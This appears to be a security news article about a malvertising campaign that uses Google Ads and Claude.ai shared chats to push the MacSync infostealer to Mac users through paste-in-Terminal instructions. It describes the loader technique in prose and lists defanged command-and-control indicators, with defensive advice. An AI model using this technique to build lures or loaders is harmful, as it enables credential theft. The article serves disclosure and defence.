Attackers Weaponize Claude.ai Shared Chats to Push Mac Malware

Security researcher Berk Albayrak has uncovered an active malvertising campaign that weaponizes Google Ads and Anthropic's Claude.ai shared chat feature to distribute the MacSync infostealer. The attack is particularly insidious because it uses Anthropic's legitimate infrastructure to host malicious instructions, bypassing traditional phishing detection.

Users searching for "Claude mac download" encounter sponsored Google Ads results that point to the real claude.ai domain. But instead of landing on official download pages, victims are redirected to shared chat sessions containing fake installation guides attributed to "Apple Support."

How the Attack Works

The shared chats present themselves as official "Claude Code on Mac" installation guides. They walk users through opening Terminal and pasting commands—a common technique in ClickFix-style attacks we've covered before. What makes this different is the trust factor: both the Google Ad and the destination URL belong to legitimate domains.

The pasted commands are Base64-encoded shell scripts that execute entirely in memory via macOS's built-in osascript engine. This leaves minimal disk traces and makes forensic analysis harder.

First-stage loaders retrieve polymorphic second-stage payloads with unique obfuscation per request. This means traditional file-hash IOCs become useless within hours of discovery.

MacSync Infostealer Capabilities

Once installed, MacSync targets:

• Browser credentials and cookies across all major browsers
• macOS Keychain contents
• Victim profiling data including IP address, hostname, OS version, and keyboard locale

One variant includes geographic targeting that silently exits if CIS-region keyboard inputs are detected—a common pattern in infostealers originating from Eastern Europe.

Indicators of Compromise

Researchers identified the following C2 infrastructure:

• hxxp://customroofingcontractors[.]com/curl/
• hxxps://bernasibutuwqu2[.]com/debug/loader.sh
• briskinternet[.]com (reportedly offline)

Why This Matters

This attack represents a concerning evolution in malvertising. Attackers no longer need to register lookalike domains or spin up convincing phishing pages. By hosting malicious content within legitimate platforms, they inherit the trust users place in those services.

The abuse of AI assistant shared chats is novel but likely to be copied. Any platform that allows public sharing of conversation content—and doesn't scan for malicious instructions—could become an attack vector.

For those researching AI-powered social engineering techniques, our recommended cybersecurity reading covers how attackers exploit trust relationships at scale.

Protecting Yourself

Navigate directly to claude.ai for any downloads. The legitimate Claude Code CLI is available through Anthropic's official documentation and does not require pasting commands from a chat interface.

Treat any terminal commands from shared chats with extreme suspicion, regardless of how official they appear. Organizations can monitor for connections to the C2 domains listed above and consider blocking Google Ads on corporate machines used for development work.